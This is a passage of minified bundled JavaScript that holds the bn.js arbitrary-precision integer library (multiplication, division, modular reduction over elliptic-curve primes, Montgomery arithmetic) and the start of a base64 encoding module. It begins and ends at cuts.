$n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},4594:function(Pe,we,de){var $,ie=de(5449).Buffer;$=()=>(()=>{var j={9742:(Q,F)=>{"use strict";F.byteLength=function(w){var x=p(w),O=x[1];return 3*(x[0]+O)/4-O},F.toByteArray=function(w){var x,S,z,O=p(w),U=O[0],K=O[1],ee=new b(3*(U+(z=K))/4-z),se=0,ve=K>0?U-4:U;for(S=0;S<ve;S+=4)x=g[w.charCodeAt(S)]<<18|g[w.charCodeAt(S+1)]<<12|g[w.charCodeAt(S+2)]<<6|g[w.charCodeAt(S+3)],ee[se++]=x>>16&255,ee[se++]=x>>8&255,ee[se++]=255&x;return 2===K&&(x=g[w.charCodeAt(S)]<<2|g[w.charCodeAt(S+1)]>>4,ee[se++]=255&x),1===K&&(x=g[w.charCodeAt(S)]<<10|g[w.charCodeAt(S+1)]<<4|g[w.charCodeAt(S+2)]>>2,ee[se++]=x>>8&255,ee[se++]=255&x),ee},F.fromByteArray=function(w){for(var x,S=w.length,O=S%3,U=[],K=16383,ee=0,se=S-O;ee<se;ee+=K)U.push(D(w,ee,ee+K>se?se:ee+K));return 1===O?U.push(E[(x=w[S-1])>>2]+E[x<<4&63]+"=="):2===O&&U.push(E[(x=(w[S-2]<<8)+w[S-1])>>10]+E[x>>4&63]+E[x<<2&63]+"="),U.join("")};for(var E=[],g=[],b="undefined"!=typeof Uint8Array?Uint8Array:Array,_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",y=0,M=_.length;y<M;++y)E[y]=_[y],g[_.charCodeAt(y)]=y;function p(w){var x=w.length;if(x%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var 